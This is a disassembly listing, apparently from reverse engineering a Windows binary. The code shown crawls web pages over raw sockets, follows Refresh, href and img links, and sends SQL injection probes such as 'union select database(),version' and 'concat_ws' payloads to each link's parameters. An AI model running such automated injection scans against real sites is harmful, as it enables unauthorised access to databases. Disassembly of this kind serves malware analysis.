loc_40D8B4: ; CODE XREF: sub_40D810+94�j
; sub_40D810+98�j
cmp [eax], bl
jz short loc_40D8F7
mov [eax], bl
mov eax, [ebp-10h]
cmp [eax+1], bl
jz short loc_40D8ED
inc eax
inc eax
jmp short loc_40D8EA
; ---------------------------------------------------------------------------
loc_40D8C6: ; CODE XREF: sub_40D810+83�j
cmp cl, bl
jz short loc_40D8F7
mov dl, [edi]
loc_40D8CC: ; CODE XREF: sub_40D810+C8�j
cmp cl, dl
jz short loc_40D8DA
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_40D8CC
loc_40D8DA: ; CODE XREF: sub_40D810+BE�j
mov cl, [eax]
cmp cl, bl
jz short loc_40D8F7
cmp cl, dl
jnz short loc_40D8ED
mov [eax], bl
mov eax, [ebp-10h]
inc eax
loc_40D8EA: ; CODE XREF: sub_40D810+B4�j
mov [ebp-10h], eax
loc_40D8ED: ; CODE XREF: sub_40D810+B0�j
; sub_40D810+D2�j
mov cl, [eax]
cmp cl, bl
jnz loc_40D861
loc_40D8F7: ; CODE XREF: sub_40D810+48�j
; sub_40D810+87�j ...
cmp [ebp-20h], ebx
jz short loc_40D90A
mov eax, [ebp-1Ch]
sub eax, [ebp-20h]
sar eax, 2
cmp [ebp+0Ch], eax
jb short loc_40D91C
loc_40D90A: ; CODE XREF: sub_40D810+EA�j
mov ecx, [ebp+8]
push offset byte_44D6A4
call sub_40D542
mov [ebp-14h], esi
jmp short loc_40D934
; ---------------------------------------------------------------------------
loc_40D91C: ; CODE XREF: sub_40D810+F8�j
push dword ptr [ebp+0Ch]
lea ecx, [ebp-24h]
call sub_40F0A3
push dword ptr [eax]
mov ecx, [ebp+8]
call sub_40D542
mov [ebp-14h], esi
loc_40D934: ; CODE XREF: sub_40D810+10A�j
lea ecx, [ebp-34h]
call sub_40D58A
lea ecx, [ebp-24h]
mov [ebp-4], bl
call sub_40F08A
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 10h
sub_40D810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D95B proc near ; CODE XREF: sub_40DB4B+42�p
; sub_40DB4B+95�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
and [ebp+var_4], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D810
mov eax, [ebp+arg_0]
leave
retn 0Ch
sub_40D95B endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D97A proc near ; CODE XREF: sub_40DB4B+3C3�p
; sub_40DB4B+3F2�p ...
jmp sub_40D60A
sub_40D97A endp
; =============== S U B R O U T I N E =======================================
sub_40D97F proc near ; CODE XREF: .text:0040E4BF�p
; .text:0040E862�p ...
arg_0 = dword ptr 4
mov eax, [ecx+4]
add eax, [esp+arg_0]
retn 4
sub_40D97F endp
; =============== S U B R O U T I N E =======================================
sub_40D989 proc near ; CODE XREF: sub_40D60A+7�p
; sub_40D66C+7�p ...
mov eax, [ecx+4]
retn
sub_40D989 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D98D proc near ; CODE XREF: sub_40DA0E+29�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push esi
push eax
push 101h
call dword_42F290 ; WSAStartup
push 6
push 1
push 2
call dword_42F29C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40DA04
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_42F2B8 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4140CF
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_42F294 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40DA09
push esi
call dword_42F298 ; closesocket
loc_40DA04: ; CODE XREF: sub_40D98D+2D�j
or eax, 0FFFFFFFFh
jmp short loc_40DA0B
; ---------------------------------------------------------------------------
loc_40DA09: ; CODE XREF: sub_40D98D+6E�j
mov eax, esi
loc_40DA0B: ; CODE XREF: sub_40D98D+7A�j
pop esi
leave
retn
sub_40D98D endp
; =============== S U B R O U T I N E =======================================
sub_40DA0E proc near ; CODE XREF: .text:0040E147�p
; .text:0040E372�p ...
mov eax, offset loc_42EC48
call sub_423A68
mov eax, 1014h
call sub_4220C0
mov eax, [ebp+10h]
push esi
xor esi, esi
push dword ptr [eax+40h]
lea ecx, [eax+10h]
mov [ebp-20h], esi
call sub_40D989
push eax
call sub_40D98D
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+10h], eax
jnz short loc_40DA58
mov ecx, [ebp+8]
push offset byte_44D6A4
call sub_40D542
jmp loc_40DB3B
; ---------------------------------------------------------------------------
loc_40DA58: ; CODE XREF: sub_40DA0E+36�j
push ebx
push edi
push esi
push dword ptr [ebp+0Ch]
call sub_422120
pop ecx
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+10h]
call dword_42F288 ; send
push offset byte_44D6A4
lea ecx, [ebp-1Ch]
call sub_40D542
mov edi, dword_42F28C
mov [ebp-4], esi
mov esi, 1000h
loc_40DA8C: ; CODE XREF: sub_40DA0E+B4�j
; sub_40DA0E+DC�j
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_42F28C
mov ebx, eax
test ebx, ebx
jle short loc_40DAEC
cmp ebx, esi
jge short loc_40DAAD
and byte ptr [ebp+ebx-1020h], 0
loc_40DAAD: ; CODE XREF: sub_40DA0E+95�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_40D622
and dword ptr [ebp+0Ch], 0
test ebx, ebx
jle short loc_40DA8C
loc_40DAC4: ; CODE XREF: sub_40DA0E+DA�j
mov eax, [ebp+0Ch]
push 4
push offset asc_4381A8 ; "\r\n\r\n"
lea eax, [ebp+eax-1020h]
push eax
call sub_423AD0
add esp, 0Ch
test eax, eax
jz short loc_40DAEC
inc dword ptr [ebp+0Ch]
cmp [ebp+0Ch], ebx
jl short loc_40DAC4
jmp short loc_40DA8C
; ---------------------------------------------------------------------------
loc_40DAEC: ; CODE XREF: sub_40DA0E+91�j
; sub_40DA0E+D2�j ...
push 0
lea eax, [ebp-1020h]
push esi
push eax
push dword ptr [ebp+10h]
call edi ; dword_42F28C
test eax, eax
jle short loc_40DB1C
cmp eax, esi
jge short loc_40DB0B
and byte ptr [ebp+eax-1020h], 0
loc_40DB0B: ; CODE XREF: sub_40DA0E+F3�j
lea eax, [ebp-1020h]
lea ecx, [ebp-1Ch]
push eax
call sub_40D622
jmp short loc_40DAEC
; ---------------------------------------------------------------------------
loc_40DB1C: ; CODE XREF: sub_40DA0E+EF�j
push dword ptr [ebp+10h]
call dword_42F298 ; closesocket
mov ecx, [ebp+8]
lea eax, [ebp-1Ch]
push eax
call sub_40D566
lea ecx, [ebp-1Ch]
call sub_40D58A
pop edi
pop ebx
loc_40DB3B: ; CODE XREF: sub_40DA0E+45�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
leave
retn
sub_40DA0E endp
; =============== S U B R O U T I N E =======================================
sub_40DB4B proc near ; CODE XREF: .text:0040DFED�p
; .text:0040E2E0�p ...
mov eax, offset loc_42ECF4
call sub_423A68
sub esp, 50h
push esi
xor esi, esi
cmp [ebp+8], esi
jnz short loc_40DB67
xor eax, eax
jmp loc_40DF7B
; ---------------------------------------------------------------------------
loc_40DB67: ; CODE XREF: sub_40DB4B+13�j
push ebx
push edi
lea ecx, [ebp-1Ch]
call sub_40D512
push dword ptr [ebp+8]
lea ecx, [ebp-1Ch]
mov [ebp-4], esi
call sub_40D5BD
mov ebx, offset asc_4381C4 ; ":"
lea eax, [ebp-3Ch]
push ebx
push esi
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
mov edi, [ebp+0Ch]
push eax
mov ecx, edi
mov byte ptr [ebp-4], 1
call sub_40D60A
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_40D58A
push offset aHttp ; "http"
mov ecx, edi
call sub_40D684
test eax, eax
jz short loc_40DBD1
push offset aFtp ; "ftp"
mov ecx, edi
call sub_40D684
test eax, eax
jnz loc_40DF6F
loc_40DBD1: ; CODE XREF: sub_40DB4B+70�j
mov esi, offset asc_4381B4 ; "/"
lea eax, [ebp-3Ch]
push esi
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
push 40h
mov ecx, eax
mov byte ptr [ebp-4], 2
call sub_40D6DF
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
mov [ebp+8], eax
call sub_40D58A
cmp dword ptr [ebp+8], 0
push esi
lea ecx, [ebp-1Ch]
push 1
jz loc_40DE0B
lea eax, [ebp-5Ch]
push eax
call sub_40D95B
push offset a@ ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 3
call sub_40D95B
push ebx
lea ecx, [ebp-3Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 4
call sub_40D95B
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 5
call sub_40D60A
lea ecx, [ebp-3Ch]
call sub_40D58A
lea ecx, [ebp-4Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-5Ch]
call sub_40D58A
push offset byte_44D6A4
lea ecx, [edi+10h]
call sub_40D684
test eax, eax
jnz short loc_40DC83
loc_40DC7C: ; CODE XREF: sub_40DB4B+23F�j
; sub_40DB4B+2BB�j ...
xor esi, esi
jmp loc_40DF6F
; ---------------------------------------------------------------------------
loc_40DC83: ; CODE XREF: sub_40DB4B+12F�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
push offset a@ ; "@"
lea ecx, [ebp-4Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 6
call sub_40D95B
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 7
call sub_40D95B
mov ecx, eax
call sub_40D989
push eax
call sub_422B5A
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_40D58A
lea ecx, [ebp-4Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_40D58A
cmp dword ptr [edi+40h], 0
jnz short loc_40DD1B
push offset aHttp ; "http"
mov ecx, edi
call sub_40D684
test eax, eax
jnz short loc_40DD04
mov dword ptr [edi+40h], 50h
loc_40DD04: ; CODE XREF: sub_40DB4B+1B0�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_40D684
test eax, eax
jnz short loc_40DD1B
mov dword ptr [edi+40h], 15h
loc_40DD1B: ; CODE XREF: sub_40DB4B+1A0�j
; sub_40DB4B+1C7�j
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
push offset a@ ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 8
call sub_40D95B
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 9
call sub_40D95B
lea ecx, [edi+20h]
push eax
mov byte ptr [ebp-4], 0Ah
call sub_40D60A
lea ecx, [ebp-5Ch]
call sub_40D58A
lea ecx, [ebp-4Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_40D58A
push offset byte_44D6A4
lea ecx, [edi+20h]
call sub_40D684
test eax, eax
jz loc_40DC7C
push esi
lea eax, [ebp-3Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
push offset a@ ; "@"
lea ecx, [ebp-4Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Bh
call sub_40D95B
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_40D95B
lea ebx, [edi+30h]
push eax
mov ecx, ebx
mov byte ptr [ebp-4], 0Dh
call sub_40D60A
lea ecx, [ebp-5Ch]
call sub_40D58A
lea ecx, [ebp-4Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-3Ch]
call sub_40D58A
push offset byte_44D6A4
mov ecx, ebx
call sub_40D684
test eax, eax
jnz loc_40DED6
jmp loc_40DC7C
; ---------------------------------------------------------------------------
loc_40DE0B: ; CODE XREF: sub_40DB4B+C0�j
lea eax, [ebp-4Ch]
push eax
call sub_40D95B
push ebx
lea ecx, [ebp-5Ch]
push 0
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Eh
call sub_40D95B
lea ecx, [edi+10h]
push eax
mov byte ptr [ebp-4], 0Fh
call sub_40D60A
lea ecx, [ebp-5Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_40D58A
push offset byte_44D6A4
lea ecx, [edi+10h]
call sub_40D684
test eax, eax
jz loc_40DC7C
push esi
lea eax, [ebp-4Ch]
push 1
push eax
lea ecx, [ebp-1Ch]
call sub_40D95B
push ebx
lea ecx, [ebp-5Ch]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 10h
call sub_40D95B
mov ecx, eax
call sub_40D989
push eax
call sub_422B5A
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_40D58A
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_40D58A
cmp dword ptr [edi+40h], 0
jnz short loc_40DED6
push offset aHttp ; "http"
mov ecx, edi
call sub_40D684
test eax, eax
jnz short loc_40DEBF
mov dword ptr [edi+40h], 50h
loc_40DEBF: ; CODE XREF: sub_40DB4B+36B�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_40D684
test eax, eax
jnz short loc_40DED6
mov dword ptr [edi+40h], 15h
loc_40DED6: ; CODE XREF: sub_40DB4B+2B5�j
; sub_40DB4B+35B�j ...
push esi
lea ecx, [ebp-1Ch]
call sub_40D71D
push eax
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
call sub_40D7ED
push esi
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 11h
call sub_40D71D
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_40D7ED
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 12h
call sub_40D97A
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_40D58A
push esi
lea ecx, [ebp-2Ch]
call sub_40D71D
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_40D7ED
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 13h
call sub_40D97A
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_40D58A
add edi, 44h
push esi
mov ecx, edi
call sub_40D5BD
lea eax, [ebp-2Ch]
mov ecx, edi
push eax
call sub_40D66C
lea ecx, [ebp-2Ch]
call sub_40D58A
xor esi, esi
inc esi
loc_40DF6F: ; CODE XREF: sub_40DB4B+80�j
; sub_40DB4B+133�j
lea ecx, [ebp-1Ch]
call sub_40D58A
pop edi
mov eax, esi
pop ebx
loc_40DF7B: ; CODE XREF: sub_40DB4B+17�j
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_40DB4B endp
; ---------------------------------------------------------------------------
loc_40DF88: ; DATA XREF: sub_403B2C+5FEE�o
mov eax, offset loc_42EEAC
call sub_423A68
sub esp, 0C40h
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 22Ah
mov esi, eax
lea edi, [ebp-0C4Ch]
xor ebx, ebx
rep movsd
mov dword ptr [eax+8A4h], 1
mov eax, [ebp-0C4Ch]
lea ecx, [ebp-1F4h]
mov [ebp-34h], eax
mov [ebp-48h], ebx
call sub_40F035
mov [ebp-4], ebx
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
lea eax, [ebp-1F4h]
push eax
lea eax, [ebp-0C48h]
push eax
call sub_40DB4B
add esp, 0Ch
test eax, eax
jnz short loc_40E05E
cmp [ebp-3ACh], ebx
mov esi, offset aFailedToParse_ ; "Failed to parse."
jnz short loc_40E021
cmp [ebp-3B0h], ebx
jnz short loc_40E029
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_4104F6
add esp, 0Ch
loc_40E021: ; CODE XREF: .text:0040E004�j
cmp [ebp-3B0h], ebx
jz short loc_40E03C
loc_40E029: ; CODE XREF: .text:0040E00C�j
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_410491
add esp, 0Ch
loc_40E03C: ; CODE XREF: .text:0040E027�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1F4h]
call sub_40F05F
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40E05E: ; CODE XREF: .text:0040DFF7�j
xor eax, eax
cmp off_437718, ebx
jz short loc_40E072
loc_40E068: ; CODE XREF: .text:0040E070�j
inc eax
cmp off_437718[eax*4], ebx
jnz short loc_40E068
loc_40E072: ; CODE XREF: .text:0040E066�j
dec eax
cmp [ebp-3C0h], ebx
mov [ebp-0D0h], eax
jle loc_40EFC5
mov esi, offset asc_433F94 ; " "
mov edi, offset asc_438724 ; "="
loc_40E08F: ; CODE XREF: .text:0040EFBF�j
push dword ptr [ebp-0D0h]
push ebx
call sub_41409E
mov eax, off_437718[eax*4]
pop ecx
pop ecx
mov [ebp+8], eax
lea ecx, [ebp-30h]
call sub_40D512
lea ecx, [ebp-20h]
call sub_40D512
cmp dword ptr [ebp-3C4h], 50h
mov byte ptr [ebp-4], 2
lea ecx, [ebp-1E4h]
jnz short loc_40E0E3
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40E100
; ---------------------------------------------------------------------------
loc_40E0E3: ; CODE XREF: .text:0040E0C8�j
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40E100: ; CODE XREF: .text:0040E0E1�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-1B0h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-1F4h]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-0CCh]
push eax
call sub_40DA0E
add esp, 0Ch
mov byte ptr [ebp-4], 3
jmp loc_40EF56
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: .text:0040EF5C�j
lea ecx, [ebp-0ACh]
call sub_40F035
push 3Ch
lea ecx, [ebp-0CCh]
mov byte ptr [ebp-4], 4
call sub_40D6DF
test eax, eax
jz loc_40EF64
push 3Ch
lea ecx, [ebp-0CCh]
call sub_40D6DF
push eax
lea eax, [ebp-0F0h]
push eax
lea ecx, [ebp-0CCh]
call sub_40D7ED
lea eax, [ebp-0F0h]
lea ecx, [ebp-0CCh]
push eax
mov byte ptr [ebp-4], 5
call sub_40D97A
push 3Eh
lea ecx, [ebp-0CCh]
call sub_40D6DF
dec eax
lea ecx, [ebp-0CCh]
push eax
lea eax, [ebp-44h]
push ebx
push eax
call sub_40D75A
push esi
lea eax, [ebp-0BCh]
push ebx
push eax
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 6
call sub_40D95B
push offset aMeta ; "meta"
lea ecx, [ebp-0BCh]
mov byte ptr [ebp-4], 7
call sub_40D695
test eax, eax
jnz loc_40E398
push offset aRefresh ; "\"Refresh\""
lea ecx, [ebp-44h]
call sub_40D71D
test eax, eax
jz loc_40E398
push esi
lea eax, [ebp-58h]
push 3
push eax
lea ecx, [ebp-44h]
call sub_40D95B
push 3Dh
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 8
call sub_40D6DF
push eax
lea eax, [ebp-394h]
push eax
lea ecx, [ebp-58h]
call sub_40D7ED
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 9
call sub_40D97A
lea ecx, [ebp-394h]
mov byte ptr [ebp-4], 8
call sub_40D58A
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_40D97A
lea ecx, [ebp-58h]
call sub_41111F
dec eax
lea ecx, [ebp-58h]
push eax
lea eax, [ebp-374h]
push ebx
push eax
call sub_40D75A
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 0Ah
call sub_40D97A
lea ecx, [ebp-374h]
mov byte ptr [ebp-4], 8
call sub_40D58A
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_40D97A
lea eax, [ebp-58h]
lea ecx, [ebp-204h]
push eax
call sub_40D566
lea eax, [ebp-0ACh]
lea ecx, [ebp-204h]
push eax
mov byte ptr [ebp-4], 0Bh
call sub_40D989
push eax
call sub_40DB4B
pop ecx
test eax, eax
pop ecx
jz loc_40E385
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_40E314
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40E32E
; ---------------------------------------------------------------------------
loc_40E314: ; CODE XREF: .text:0040E2F9�j
push dword ptr [ebp-6Ch]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40E32E: ; CODE XREF: .text:0040E312�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-214h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-214h]
call sub_40D58A
loc_40E385: ; CODE XREF: .text:0040E2E9�j
lea ecx, [ebp-204h]
call sub_40D58A
lea ecx, [ebp-58h]
jmp loc_40EF24
; ---------------------------------------------------------------------------
loc_40E398: ; CODE XREF: .text:0040E1FC�j
; .text:0040E211�j
push offset dword_433F14
lea ecx, [ebp-0BCh]
call sub_40D695
test eax, eax
jnz loc_40E73B
push esi
lea eax, [ebp-384h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_40D95B
push edi
lea ecx, [ebp-110h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_40D95B
lea ecx, [ebp-384h]
jmp short loc_40E43F
; ---------------------------------------------------------------------------
loc_40E3E0: ; CODE XREF: .text:0040E45A�j
push offset byte_44D6A4
lea ecx, [ebp-110h]
call sub_40D684
test eax, eax
jz short loc_40E45C
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-304h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push edi
lea ecx, [ebp-244h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Fh
call sub_40D95B
push eax
lea ecx, [ebp-110h]
mov byte ptr [ebp-4], 10h
call sub_40D60A
lea ecx, [ebp-244h]
call sub_40D58A
lea ecx, [ebp-304h]
loc_40E43F: ; CODE XREF: .text:0040E3DE�j
mov byte ptr [ebp-4], 0Eh
call sub_40D58A
lea ecx, [ebp-110h]
push offset aHref ; "href"
call sub_40D695
test eax, eax
jnz short loc_40E3E0
loc_40E45C: ; CODE XREF: .text:0040E3F2�j
push offset byte_44D6A4
lea ecx, [ebp-110h]
call sub_40D684
test eax, eax
jz loc_40E730
push esi
lea eax, [ebp-264h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_40D95B
push 1
push edi
lea ecx, [ebp-160h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 11h
call sub_40D810
lea ecx, [ebp-264h]
call sub_40D58A
lea ecx, [ebp-170h]
call sub_40D512
push ebx
lea ecx, [ebp-160h]
mov byte ptr [ebp-4], 14h
call sub_40D97F
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-160h]
jnz short loc_40E4FD
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-170h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_40D6A6
add esp, 14h
jmp short loc_40E55D
; ---------------------------------------------------------------------------
loc_40E4FD: ; CODE XREF: .text:0040E4CD�j
push offset aHttp_0 ; "http://"
call sub_40D71D
test eax, eax
jz short loc_40E51F
lea eax, [ebp-160h]
lea ecx, [ebp-170h]
push eax
call sub_40D60A
jmp short loc_40E55D
; ---------------------------------------------------------------------------
loc_40E51F: ; CODE XREF: .text:0040E509�j
lea ecx, [ebp-160h]
call sub_40D989
push eax
lea ecx, [ebp-1B0h]
call sub_40D989
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_40D989
push eax
lea eax, [ebp-170h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_40D6A6
add esp, 18h
loc_40E55D: ; CODE XREF: .text:0040E4FB�j
; .text:0040E51D�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-170h]
push eax
call sub_40D989
push eax
call sub_40DB4B
pop ecx
test eax, eax
pop ecx
jz loc_40E71A
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_40E5A4
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_40D6A6
add esp, 0Ch
jmp short loc_40E5BE
; ---------------------------------------------------------------------------
loc_40E5A4: ; CODE XREF: .text:0040E589�j
push dword ptr [ebp-6Ch]
call sub_40D989
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_40D6A6
add esp, 10h
loc_40E5BE: ; CODE XREF: .text:0040E5A2�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-364h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-364h]
call sub_40D58A
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSele ; "GET %s=-1+union+select+database(),versi"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-284h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-284h]
call sub_40D58A
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_0 ; "GET %s=-1+union+select+1,2,concat_ws(0x"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-324h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-324h]
call sub_40D58A
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_40D989
push eax
push dword ptr [ebp+8]
lea ecx, [ebp-68h]
call sub_40D989
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_1 ; "GET %s=-1+union+select+1,2,concat_ws(ch"...
push eax
call sub_40D6A6
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_40D989
push eax
lea eax, [ebp-2A4h]
push eax
call sub_40DA0E
add esp, 0Ch
lea ecx, [ebp-2A4h]
call sub_40D58A
loc_40E71A: ; CODE XREF: .text:0040E579�j
lea ecx, [ebp-170h]
call sub_40D58A
lea ecx, [ebp-160h]
call sub_40D58A
loc_40E730: ; CODE XREF: .text:0040E46E�j
lea ecx, [ebp-110h]
jmp loc_40EF24
; ---------------------------------------------------------------------------
loc_40E73B: ; CODE XREF: .text:0040E3AA�j
push offset aImg ; "img"
lea ecx, [ebp-0BCh]
call sub_40D695
test eax, eax
jnz loc_40E9D9
push esi
lea eax, [ebp-3A4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
